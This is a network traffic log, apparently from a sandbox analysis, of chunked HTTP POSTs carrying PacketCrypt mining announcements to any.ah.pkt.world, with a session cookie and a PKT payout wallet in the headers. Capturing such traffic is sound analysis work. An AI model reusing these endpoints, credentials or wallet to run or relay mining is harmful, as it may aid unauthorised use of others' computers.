Jan 7, 2025 13:58:52.334033012 CET	1236	OUT	Data Raw: 7f f3 f9 25 d7 a0 ed 21 70 11 10 b9 72 c6 56 37 8f 3e fb 5c 39 61 a8 e5 7b 7b 5d 63 5c 2f d9 e0 88 f7 a8 7f 5a a2 d1 7d 83 3c 64 e1 61 62 c6 b9 a8 17 d9 8f a8 d1 83 f5 1f ec 3a e7 a7 2a 1c 6d d1 1d 37 8c 76 1e 6c 9f f7 b1 7e d4 6a 01 b6 d8 e3 88 Data Ascii: %!prV7>\9a{{]c\/Z}<dab:m7vl~j_hMoM1I}p'z^SN"F8,_A#<K1X:HBS6/&y1M[\SNw gf#Ha,400NN\|CgJ+
Jan 7, 2025 13:58:52.334098101 CET	2472	OUT	Data Raw: e3 bf 8d 0b 89 08 e9 eb dc 0f 0d 0a 34 30 30 0d 0a 01 b2 37 00 4d 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4007M\|CgJ+B U!:k$6Guw.g4fZO(YqZy%+N\|KX]jw&u<\|)#O9.h6pPFTR:#GZHF
Jan 7, 2025 13:58:52.334121943 CET	2472	OUT	Data Raw: 08 37 ce 97 14 f3 86 74 b1 f9 51 c0 ab f5 c4 32 2f 57 c4 d6 0f 20 ef 85 42 f5 71 02 ff a3 9c ca f0 bd ad 1c 6c d3 af d6 90 d2 8d ef 02 5c 44 6d 18 61 59 b0 43 95 7c 65 9d 7b 79 5b a1 ee 55 24 16 13 77 39 bc 0f e2 bc 50 93 ef 5d 0e 05 a4 38 bd 73 Data Ascii: 7tQ2/W Bql\DmaYC\|e{y[U$w9P]8sa1-f(iG,nn&}?% t}QNr]]4B*9uaNg35{{1~7="4z{Ru4Qzri9b$\WN8H=
Jan 7, 2025 13:58:52.334189892 CET	4944	OUT	Data Raw: aa 66 a8 4a 65 cc 26 d1 f6 bb bb eb 72 6e 40 b6 f5 a6 c6 bf 68 84 3b aa c1 26 6f db 06 88 70 b2 8a ba 17 fb 14 58 27 98 34 70 29 8c 35 ca 13 3c 4a 54 bb c3 e3 2c 95 51 26 bd 94 c5 f5 27 55 25 2b 8f 14 ee 2b 74 07 7d e7 1c d2 55 af c8 f5 4e 9c 97 Data Ascii: fJe&rn@h;&opX'4p)5<JT,Q&'U%++t}UNH~\|xiV@L:YHRx8QFA.<!9t;yz6!gxA:KQb^qD17~7<9'YUIw`-400nN\|CgJ+
Jan 7, 2025 13:58:52.334260941 CET	2472	OUT	Data Raw: 79 bd 01 52 6a 6a 95 38 0a 60 43 3b f1 85 91 bd d9 98 81 b4 84 77 3d d1 b6 05 61 ad 33 36 13 92 13 b3 2e a9 b7 de 77 40 93 76 07 f9 ba 07 8e 34 d4 90 3b 6a ef a9 f7 9f ae 26 19 1d 82 ae 25 52 98 6d 5d 76 4c 79 a8 e4 fd ba 6e d2 7a 05 6d ba cb 79 Data Ascii: yRjj8`C;w=a36.w@v4;j&%Rm]vLynzmy:;q5jo=VyL)!`mNr?U5bJS,U#@h5lRi_W-d%V_I:GHvCHW1_sn\juZt#ZU
Jan 7, 2025 13:58:52.334300995 CET	2472	OUT	Data Raw: a3 a9 39 a1 a8 f7 79 c1 05 75 bb c8 47 ce ef 5f f8 76 36 bd e2 25 0d 0a 34 30 30 0d 0a 01 0b 80 00 4e 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 9yuG_v6%400N\|CgJ+FFpZw^6=]I&2bq4vipj2T!Ycyg4 "ih-(],vQ[prx&je
Jan 7, 2025 13:58:52.334323883 CET	2472	OUT	Data Raw: 0d 19 bc b2 3e 12 d8 ad 54 97 2b 3b 09 28 a3 29 c9 e1 04 da 33 6e a8 0f ff fb a6 d4 a9 ce 03 2b 6d 15 cf c4 9d 3f 6a 30 76 45 9d bf e8 30 ad f7 33 8a b9 9d cb 15 f0 ed 2e b4 2c ae 2f 50 f7 2e f6 e2 5a 6e 9f 95 bc d7 cb e5 43 23 38 dc cb c4 f0 e0 Data Ascii: >T+;()3n+m?j0vE03.,/P.ZnC#87~c%.2MrR^fSz.k{!(<i5uuOwLf.gA\itw}fp!Su^t?dST!PB
Jan 7, 2025 13:58:52.334335089 CET	2472	OUT	Data Raw: 7f 94 53 32 c9 70 01 05 a7 86 33 2d 5d 58 09 0e ba 61 0d 91 14 98 80 88 41 4f 2f 3c 1e 9d 2f 51 87 56 90 9e 7f c8 98 b8 77 51 1f 47 fb 83 c4 82 c7 f5 61 4d a9 67 d7 45 a5 97 e7 13 aa 79 19 6e fc e6 64 3a 3c 8e fa e7 b9 f6 4d a3 03 3c 52 97 e0 58 Data Ascii: S2p3-]XaAO/</QVwQGaMgEynd:<M<RX/,J9z82l.}/#L0+yA.<!9t;yz6!gxA:KQb^qD17aa\|j*S\|9-oHKL<I400E
Jan 7, 2025 13:58:52.334368944 CET	2472	OUT	Data Raw: 63 7a 36 bd d8 16 1f fc c5 85 3e 94 9e 87 a6 6e 46 54 21 bf 02 f0 c5 45 54 24 5e bc d7 ef 23 1a a0 44 fd f0 ab 5b 70 f5 94 8d 6c 91 8d dd 29 7a 76 b3 b4 0f c8 99 2b b5 7c 2d 29 52 ce 18 6a 04 dd 92 d3 97 d7 c7 ee 76 c5 0b 51 19 f5 02 94 29 10 e4 Data Ascii: cz6>nFT!ET$^#D[pl)zv+\|-)RjvQ)/*?.}pk>@\|-RhR{xJ`U7pZu_G}8AiYgjW)PzMsz5BLQjrz5'W~46r#cm&yfkid~&bZLFFuWn)
Jan 7, 2025 13:58:53.444045067 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:58:53 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 33 37 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 33 37 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 33 33 33 34 39 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 35 2d 46 32 44 44 42 34 39 39 35 31 45 38 30 34 33 31 46 38 45 35 33 30 42 32 46 35 45 45 46 44 45 37 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":537,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":537,"totalLen":0,"target":521618356,"time":1736254733349,"eventId":"cah-2837095-F2DDB49951E80431F8E530B2F5EEFDE7"}}
Jan 7, 2025 13:58:53.657222986 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:58:53 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 33 37 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 33 37 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 33 33 33 34 39 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 35 2d 46 32 44 44 42 34 39 39 35 31 45 38 30 34 33 31 46 38 45 35 33 30 42 32 46 35 45 45 46 44 45 37 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":537,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":537,"totalLen":0,"target":521618356,"time":1736254733349,"eventId":"cah-2837095-F2DDB49951E80431F8E530B2F5EEFDE7"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:59:01.882761002 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837096 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 13:59:01.882852077 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 bb 32 05 4f 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4002O\|CgJ+;w/E2/CW=}g.sv&B&HK\-H4z4@C4f9O1J(X&l{!E2r`1! T[T~n(tSKsk%lpk
Jan 7, 2025 13:59:01.887610912 CET	1236	OUT	Data Raw: 60 7f 6d cd 61 0b cf ab 32 0c 1a 8d 58 4a 47 6f 33 59 56 9c 79 c5 e3 ca 57 e2 37 36 b4 42 45 74 c8 a2 4d 1a 41 00 65 b5 9b b9 5d c4 92 59 2b 86 52 41 25 bf b8 b0 6c e6 37 10 57 7e 4f 2e dc 23 9a 48 37 26 c1 74 d2 f3 dd e7 f2 6a f2 1d 2d a4 85 e1 Data Ascii: `ma2XJGo3YVyW76BEtMAe]Y+RA%l7W~O.#H7&tj-CbS^7"Gq2y]gVBVQbNh&//V+=GM%q&MPz%I,:\|)[J}400_L\|CgJ+
Jan 7, 2025 13:59:01.887660980 CET	2472	OUT	Data Raw: 58 b9 b8 38 0d fc ad 67 e9 89 0d 0a 34 30 30 0d 0a 01 13 58 05 4f 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: X8g400XO\|CgJ+U1hj+5fQVU<Pwh>\|>Z)yS@26vt{TP&==t/*v \Ryv=]as3AEaNf^WiZvI}
Jan 7, 2025 13:59:01.887842894 CET	4944	OUT	Data Raw: 81 48 ca c2 9b e0 77 fc 21 f3 15 53 26 f0 5b 39 72 a0 74 95 63 bd 8e f9 e8 85 00 2a 9c 53 80 dc cb d4 26 18 ae 65 88 c3 6a f9 bd 73 6c 91 cd cd 1a ef 4f 34 07 6c 2d 0b b6 ad a0 af 4d 7b 2e 0c 02 ff a2 f4 63 99 bd 68 ec 97 55 8b 21 4b d5 8a e6 a5 Data Ascii: Hw!S&[9rtcS&ejslO4l-M{.chU!Kj;5S\|G w6lPCY10sjl9Rk6H(Ew!Nk,nHg;7TW,t7?1\_\sy< Ed9N@U=
Jan 7, 2025 13:59:01.887885094 CET	2472	OUT	Data Raw: 3b 93 b6 62 81 01 8e 3c 28 18 c8 2a 7a 02 22 d1 d8 48 35 4a e8 9f 8b 51 8f 6d a0 a7 78 ab b0 48 93 54 35 5b 48 de 6c 27 a8 27 7d 20 5b 74 31 d4 e2 8c 62 06 78 c1 39 37 9e 86 00 28 92 21 d7 d4 fb 5f 68 88 ee 13 ff 5a 7f d0 b1 b8 a7 54 27 b7 ab 98 Data Ascii: ;b<(z"H5JQmxHT5[Hl''} [t1bx97(!_hZT'I8dots,=XNGu0\I/O-d\|NR@5\|;L(8q<U@5z=Y0VKK3C7a!~G\ZV''pQ
Jan 7, 2025 13:59:01.887896061 CET	2472	OUT	Data Raw: a3 7f b5 bb 1e 5b 13 7f 0d 74 a2 7f 1b 60 a5 71 cb 21 ac ae 53 ba db 2a c5 84 3d e5 01 3d 01 4f 15 c2 8b 8e a9 6a 97 21 39 ae 95 16 87 bd f9 32 69 67 69 38 2c 81 76 b5 58 fc 33 a3 9f 4f 7f d1 a4 7a 58 22 e9 6d e1 38 29 b2 91 9d 59 a3 5b 9e 00 4b Data Ascii: [t`q!S==Oj!92igi8,vX3OzX"m8)Y[KGe6+=oZ\3HtttB^Wh9xd3ur0Q_n<};q`7}/~>H}<L'r)kLEi`P8W0kI\*.S#VF$<d
Jan 7, 2025 13:59:01.888091087 CET	4944	OUT	Data Raw: 58 19 58 ee fe 98 db 0f 8c 89 f7 78 89 f9 87 3b 49 cc e6 f5 ce 2a 0d 0a 34 30 30 0d 0a 01 8c a4 05 4c 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: XXx;I*400L\|CgJ+SuA)r/Hu\|8ug,f>7N2oi-H^3`c^]t2IN{]YrGd:o9OM~lH,
Jan 7, 2025 13:59:01.888149023 CET	2472	OUT	Data Raw: 32 79 93 07 f7 a3 e2 c0 aa ac 2e d6 f0 85 9c 03 d9 46 7e 07 0a 32 1c d4 b9 53 e5 99 80 5c 17 7d 90 2c d0 f3 9f 2d 64 18 92 ff 08 58 5f b2 0b f3 02 a3 c4 87 e8 46 2f 5a c4 dd 6a 91 34 32 67 67 02 34 28 ca 66 99 2e 18 4a 31 bd de e2 c1 b6 cc e5 80 Data Ascii: 2y.F~2S\},-dX_F/Zj42gg4(f.J1SK`/pV[?_c~hq']gVBVQbNh&//V+=GM%q&MP<],e64+;C[ Pz#400S
Jan 7, 2025 13:59:01.888190031 CET	1236	OUT	Data Raw: 0d c1 63 e0 2b a4 a8 2d 6c c3 11 0b df 8b 95 ee 9d 2f 4e 15 94 6f f1 67 e8 b7 5c b0 65 92 fc e0 fc 72 e2 7d 0c 80 a8 2d 2d 88 60 28 13 1b e3 69 4a a8 93 61 45 d0 2c f7 9f 1d da 25 5d a2 5e 91 5d 09 8d 35 23 fe 8a 43 76 10 c9 a6 2f a3 03 b9 b9 43 Data Ascii: c+-l/Nog\er}--`(iJaE,%]^]5#Cv/C'`DTZif-"gq'PM2OUkMIM=A\|_prPr+BcY&H636VVG-){Igh.(7D
Jan 7, 2025 13:59:01.892420053 CET	1236	OUT	Data Raw: 1b b3 9b 93 7c 9d 42 37 08 26 24 cd 2e 41 2d db c7 7c b4 e6 72 bb 5f 1a 4b ad 52 06 f4 76 bb 36 ff 7f 1d 0e 21 12 71 1b 4e b2 01 6f 35 6f f1 83 2d 48 48 1c 2d 7f 20 e1 20 d0 7c 2f 08 b3 28 71 90 45 49 8e 27 82 1c 58 da 74 e8 99 ce 26 a7 fc 9f 97 Data Ascii: \|B7&$.A-\|r_KRv6!qNo5o-HH- \|/(qEI'Xt&/{N\|J$}Q;N=d3jSJ+Q>c:(%7vcr<r:&~,o~EnsJ!b pXO?P3qEH4M\~@^D)oyWqw/B}!vE
Jan 7, 2025 13:59:03.261801004 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:03 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 34 31 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 34 31 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 34 33 31 36 34 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 35 2d 44 36 35 38 39 38 30 46 31 46 43 38 32 45 44 34 44 31 44 30 32 44 31 31 44 38 43 42 30 34 41 36 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":541,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":541,"totalLen":0,"target":521618356,"time":1736254743164,"eventId":"cah-2837095-D658980F1FC82ED4D1D02D11D8CB04A6"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:59:04.891906023 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837096 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 13:59:04.892002106 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 a4 1b 0c 4d 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400M\|CgJ+P$(LAL$\|9m%_g{?wBKw3qL:L~^{2>uzDToh-]>J&_U+T@;.Ro 75'G,j/0
Jan 7, 2025 13:59:04.896758080 CET	1236	OUT	Data Raw: f0 c0 40 a1 b9 cb 93 08 c3 f4 69 79 70 f4 d8 c6 d9 29 b1 13 89 22 6d e5 9c e6 ed 90 2a 9c a3 98 ae ad 88 cb f6 5f d0 15 b1 3b 7c 2c d4 97 1f f5 68 78 33 57 bf 29 0b 03 c8 d5 22 29 4b 9a 62 8f f8 58 9b b8 36 8a 67 97 07 91 1c 4d 51 56 34 b8 cc 7b Data Ascii: @iyp)"m*_;\|,hx3W)")KbX6gMQV4{?3PS\|74eUQF5jMo>P:Q/QW+]T1C6%GqKaT\|'\|t:4"1d9N5]GaF:<G?^RL&400L\|CgJ+
Jan 7, 2025 13:59:04.896898985 CET	2472	OUT	Data Raw: 79 68 6e 36 6a 9f 14 40 2c e9 0d 0a 34 30 30 0d 0a 01 8e 1b 0b 4c 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: yhn6j@,400L\|CgJ+EOyf,(/_~{wrRQDt]dY{$lAYqj2!22gJ%"8s3.[mKU+>k%
Jan 7, 2025 13:59:04.896924019 CET	2472	OUT	Data Raw: 83 db f3 15 f3 db d7 85 81 39 1a 16 f4 ef d6 fe f5 ac 52 a9 62 3c 04 f6 d6 ac 02 5d df c1 98 88 f3 a4 87 15 38 22 01 f9 b8 1c 87 ca 95 1e d9 6a 87 50 dd 2c dc 78 62 0a 60 e5 45 6b e6 e3 bd 03 75 51 23 7a 0c 46 07 bc 5b 70 43 9b 75 3e 10 7c 9e ef Data Ascii: 9Rb<]8"jP,xb`EkuQ#zF[pCu>\|ybT]:vreR^H).@>FX(^*4RFNT=!`y)X;6j!Avtkz&5@@ETm/UBDhh$
Jan 7, 2025 13:59:04.896966934 CET	2472	OUT	Data Raw: 78 67 4c 82 0d ab 2b a0 6f 89 8f 37 09 4b da 52 0d 14 cc b2 d0 e1 24 d3 0d 4d a8 73 3f 8d 32 ef 03 94 1f ed 1f e0 18 1d 3c ea e3 23 d1 9f 09 85 b1 16 ae 65 79 9b 06 71 37 47 8a 5a c0 e5 43 90 72 9d 34 2c 72 4b 64 3e 42 d5 8a 9f ff 1e a2 24 1a 6b Data Ascii: xgL+o7KR$Ms?2<#eyq7GZCr4,rKd>B$kV/W% }dGl"T[>usBHz^SN"F8,_A#<K1X:HBS6/&y1M[.&hj,CluT$,Kj&J400>M\|CgJ+
Jan 7, 2025 13:59:04.896989107 CET	2472	OUT	Data Raw: db ec 8d a8 de f6 21 10 7c d3 3b eb fd a6 79 97 66 3a a8 ed 30 2a 8b f8 3f 25 7f ef 2a 85 0c ea 7d 29 bf 2a 13 ba fc 61 1f 93 5a be 09 ce d5 ff 22 50 e7 f7 ec b7 48 5f 1a 6b 0d 5f 52 73 7d 23 c1 54 9c 8e ce 51 25 80 b0 38 98 31 b4 ec 97 69 fe b4 Data Ascii: !\|;yf:0?%})*aZ"PH_k_Rs}#TQ%81iF[@HMwPilZF_GIS}{NMDV^=kF:k4vcUy5\|t(2_g--2M-RX+LeF3W.V%ej3I3Jt
Jan 7, 2025 13:59:04.897017002 CET	2472	OUT	Data Raw: 13 d9 da 86 31 d9 b2 35 3d 86 8a b4 cb 08 ac 4d 28 52 2e ad 1c ce 7d 1d 79 d4 0a dc 61 ba fa 6c 2b ad 09 a4 55 ea b7 3b 47 2b dc 5d f0 8f 3d f4 a2 57 1e 50 b1 fa 1e 9e f7 9f 4c 93 a8 ed 63 9d 37 8f 1c 07 0a e1 de e4 cf 2c b1 15 ed b4 96 6d 73 bb Data Ascii: 15=M(R.}yal+U;G+]=WPLc7,msBONF2.\|k6];z5pY'13&[3"Dp\|L4mz5W"yr!$U8?D:Ja`CC%+7({]'8L5]<(~IVQm]
Jan 7, 2025 13:59:04.897097111 CET	9888	OUT	Data Raw: a0 c8 28 4a 1b d6 81 66 71 01 c4 e6 ee a0 a7 8d a1 94 75 ae 7e 7f 0d 0a 34 30 30 0d 0a 01 ff 5f 0c 4d 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (Jfqu~400_M\|CgJ+0HF9f)tiTZyaz+wj\|vV<UtIv+^>hNs6xmUn\|`W&@Y>V,jk:(
Jan 7, 2025 13:59:04.901716948 CET	2472	OUT	Data Raw: a1 b4 0c 0d 06 93 4a df 5f 1c c8 56 04 98 a7 1f 71 fb 53 19 c4 29 54 04 e3 de 93 82 9a 8c 4a e6 b0 bf 58 d8 cf 99 68 8e 90 ad 51 b3 ec 5c f5 93 d8 03 e5 6a 08 4d 88 d8 7a 51 cc a3 4f 01 fb 3f bb c3 34 9a 48 42 70 8c 2f 36 c8 77 2b 90 45 c5 dd f6 Data Ascii: J_VqS)TJXhQ\jMzQO?4HBp/6w+EMdI<:e$Qyw O>]>Mr\|Qd^jHv4QK>gi#01gy]Q(tmh?HMA{PG9Q2!f+Imq:8#lCl2Ge.4
Jan 7, 2025 13:59:04.901784897 CET	2472	OUT	Data Raw: 1e a9 f0 3c ee f9 a0 14 1e ce 1d 18 f7 fd 53 70 66 4a 51 16 9f 99 51 b0 b1 d4 56 f6 7c 00 c0 d2 97 a6 0d 0a 34 30 30 0d 0a 01 b4 69 0b 4f 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: <SpfJQQV\|400iO\|CgJ+6EX=?Xx"3W2p_KH,%&evnxhp6CJ~;H#dIv#
Jan 7, 2025 13:59:05.524287939 CET	458	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:05 GMT Content-Type: application/json Content-Length: 294 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 36 30 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 36 30 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 34 35 34 34 37 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 35 2d 34 37 31 35 32 32 38 41 46 36 37 41 39 46 37 35 31 39 38 44 36 41 30 31 34 41 37 30 43 44 35 44 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":60,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":60,"totalLen":0,"target":521618356,"time":1736254745447,"eventId":"cah-2837095-4715228AF67A9F75198D6A014A70CD5D"}}
Jan 7, 2025 13:59:05.733263016 CET	458	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:05 GMT Content-Type: application/json Content-Length: 294 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 36 30 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 36 30 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 34 35 34 34 37 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 35 2d 34 37 31 35 32 32 38 41 46 36 37 41 39 46 37 35 31 39 38 44 36 41 30 31 34 41 37 30 43 44 35 44 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":60,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":60,"totalLen":0,"target":521618356,"time":1736254745447,"eventId":"cah-2837095-4715228AF67A9F75198D6A014A70CD5D"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:59:15.224980116 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837097 accept: / host: any.ah.pkt.world transfer-encoding: chunked
